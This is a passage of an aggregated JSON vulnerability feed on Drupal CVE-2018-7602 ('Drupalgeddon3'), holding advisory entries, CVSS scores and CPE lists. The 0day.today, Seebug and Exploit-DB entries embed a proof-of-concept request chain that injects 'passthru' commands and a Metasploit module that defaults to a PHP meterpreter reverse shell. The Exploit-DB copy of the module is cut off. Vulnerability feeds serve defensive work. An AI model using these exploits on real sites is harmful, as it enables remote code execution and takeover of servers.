"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "cisa_kev", "title": "Drupal Core Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-13T00:00:00", "id": "CISA-KEV-CVE-2018-7602", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-26T23:27:05", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal < 7.58 - drupalgeddon3 Authenticated Remote Code Execution (PoC) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30262", "href": "https://0day.today/exploit/description/30262", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n \r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n \r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n \r\nRetrieve the form_build_id from the response, and then triggering the exploit with : \r\n \r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n \r\nThis will display the result of the whoami command.\r\n \r\nPatch your systems!\r\nBlaklis\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30262", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-07T04:41:03", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-05-01T00:00:00", "type": "zdt", "title": "Drupal < 7.58 - Drupalgeddon3 Authenticated Remote Code Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-05-01T00:00:00", "id": "1337DAY-ID-30275", "href": "https://0day.today/exploit/description/30275", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon3',\r\n 'Description' => %q{\r\n CVE-2018-7602 / SA-CORE-2018-004\r\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\r\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\r\n Which could result in the site being compromised.\r\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SixP4ck3r', # Research and port to MSF\r\n 'Blaklis' # Initial PoC\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-004'],\r\n ['CVE', '2018-7602'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 29 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\r\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def start_exploit\r\n drupal_node = datastore['DRUPAL_NODE']\r\n res = send_request_cgi({\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\r\n })\r\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form -> #{form_token}\\n\"\r\n r2 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\r\n 'vars_post' => {\r\n 'form_id' => 'node_delete_confirm',\r\n '_triggering_element_name' => 'form_id',\r\n 'form_token'=> \"#{form_token}\"\r\n }\r\n })\r\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\r\n r3 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\r\n 'vars_post' => {\r\n 'form_build_id' => \"#{form_build_id}\"\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n start_exploit\r\n else\r\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-05-07] #", "sourceHref": "https://0day.today/exploit/30275", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2020-04-06T22:40:25", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-01T00:09:00", "type": "f5", "title": "Drupal vulnerability CVE-2018-7602", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-09-13T17:57:00", "id": "F5:K59591931", "href": "https://support.f5.com/csp/article/K59591931", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-01-26T11:08:58", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core \u2013 Highly critical \u2013 Remote Code Execution \u2013 SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T00:00:00", "type": "attackerkb", "title": "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2021-04-21T00:00:00", "id": "AKB:4D0C3FF9-B5E6-4902-B9C8-DE71A77A30F2", "href": "https://attackerkb.com/topics/Joo9217ILF/drupal-core---highly-critical---remote-code-execution---sa-core-2018-004", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-26T14:36:38", "description": "A remote code execution vulnerability exists within multiple subsystems of\nDrupal 7.x and 8.x. This potentially allows attackers to exploit multiple\nattack vectors on a Drupal site, which could result in the site being\ncompromised. This vulnerability is related to Drupal core - Highly critical\n- Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this\nvulnerability are being exploited in the wild.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=896701>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7602", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-07-19T00:00:00", "id": "UB:CVE-2018-7602", "href": "https://ubuntu.com/security/CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:30:08", "description": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and\nearlier allows remote attackers to obtain sensitive information via the q[]\nparameter to index.php, which reveals the installation path in an error\nmessage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | installation path is known when using distribution packages\n", "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "ubuntucve", "title": "CVE-2012-2922", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-05-21T00:00:00", "id": "UB:CVE-2012-2922", "href": "https://ubuntu.com/security/CVE-2012-2922", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2018-06-26T22:15:29", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\r\n\r\nUpdated \u2014 this vulnerability is being exploited in the wild.\r\n\r\n#### Poc\r\nThis is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n \r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n```\r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n ```\r\n \r\nRetrieve the form_build_id from the response, and then triggering the exploit with :\r\n ```\r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n````\r\n \r\nThis will display the result of the whoami command.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7602)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "SSV:97246", "href": "https://www.seebug.org/vuldb/ssvid-97246", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:38:40", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "cve", "title": "CVE-2018-7602", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2021-04-20T12:52:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:26:36", "description": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message.", "cvss3": {}, "published": "2012-05-21T22:55:00", "type": "cve", "title": "CVE-2012-2922", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:drupal:drupal:5.22", "cpe:/a:drupal:drupal:5.10", "cpe:/a:drupal:drupal:5.18", "cpe:/a:drupal:drupal:5.20", "cpe:/a:drupal:drupal:7.12", "cpe:/a:drupal:drupal:6.2", "cpe:/a:drupal:drupal:6.1", "cpe:/a:drupal:drupal:6.5", "cpe:/a:drupal:drupal:5.16", "cpe:/a:drupal:drupal:6.18", "cpe:/a:drupal:drupal:6.10", "cpe:/a:drupal:drupal:5.21", "cpe:/a:drupal:drupal:6.6", "cpe:/a:drupal:drupal:5.4", "cpe:/a:drupal:drupal:6.17", "cpe:/a:drupal:drupal:7.5", "cpe:/a:drupal:drupal:5.1", "cpe:/a:drupal:drupal:6.4", "cpe:/a:drupal:drupal:5.3", "cpe:/a:drupal:drupal:5.15", "cpe:/a:drupal:drupal:5.5", "cpe:/a:drupal:drupal:6.3", "cpe:/a:drupal:drupal:5.19", "cpe:/a:drupal:drupal:7.6", "cpe:/a:drupal:drupal:5.9", "cpe:/a:drupal:drupal:6.16", "cpe:/a:drupal:drupal:6.14", "cpe:/a:drupal:drupal:5.8", "cpe:/a:drupal:drupal:7.10", "cpe:/a:drupal:drupal:7.1", "cpe:/a:drupal:drupal:5.13", "cpe:/a:drupal:drupal:6.0", "cpe:/a:drupal:drupal:6.15", "cpe:/a:drupal:drupal:7.14", "cpe:/a:drupal:drupal:6.11", "cpe:/a:drupal:drupal:6.7", "cpe:/a:drupal:drupal:5.6", "cpe:/a:drupal:drupal:7.8", "cpe:/a:drupal:drupal:5.23", "cpe:/a:drupal:drupal:6.9", "cpe:/a:drupal:drupal:5.0", "cpe:/a:drupal:drupal:7.4", "cpe:/a:drupal:drupal:7.11", "cpe:/a:drupal:drupal:6.8", "cpe:/a:drupal:drupal:5.14", "cpe:/a:drupal:drupal:7.9", "cpe:/a:drupal:drupal:6.12", "cpe:/a:drupal:drupal:5.2", "cpe:/a:drupal:drupal:7.2", "cpe:/a:drupal:drupal:5.7", "cpe:/a:drupal:drupal:5.12", "cpe:/a:drupal:drupal:5.11", "cpe:/a:drupal:drupal:6.13", "cpe:/a:drupal:drupal:5.17", "cpe:/a:drupal:drupal:7.3", "cpe:/a:drupal:drupal:7.7", "cpe:/a:drupal:drupal:7.0"], "id": "CVE-2012-2922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2922", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:drupal:drupal:6.18:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.13:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:dev:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.7:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:dev:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.10:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.4:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.14:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.16:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.20:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.6:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:dev:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.15:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.18:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.19:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.9:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.17:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.17:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.13:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.21:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha7:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.15:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.8:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.8:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.9:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.22:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.16:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.23:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.12:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta4:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T08:14:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-30T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["2018-7602", "CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "EDB-ID:44557", "href": "https://www.exploit-db.com/exploits/44557", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon3',\r\n 'Description' => %q{\r\n CVE-2018-7602 / SA-CORE-2018-004\r\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\r\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\r\n Which could result in the site being compromised.\r\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\r\n\r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n\r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SixP4ck3r', # Research and port to MSF\r\n 'Blaklis' # Initial PoC\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-004'],\r\n ['CVE', '2018-7602'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 29 2018',\r\n 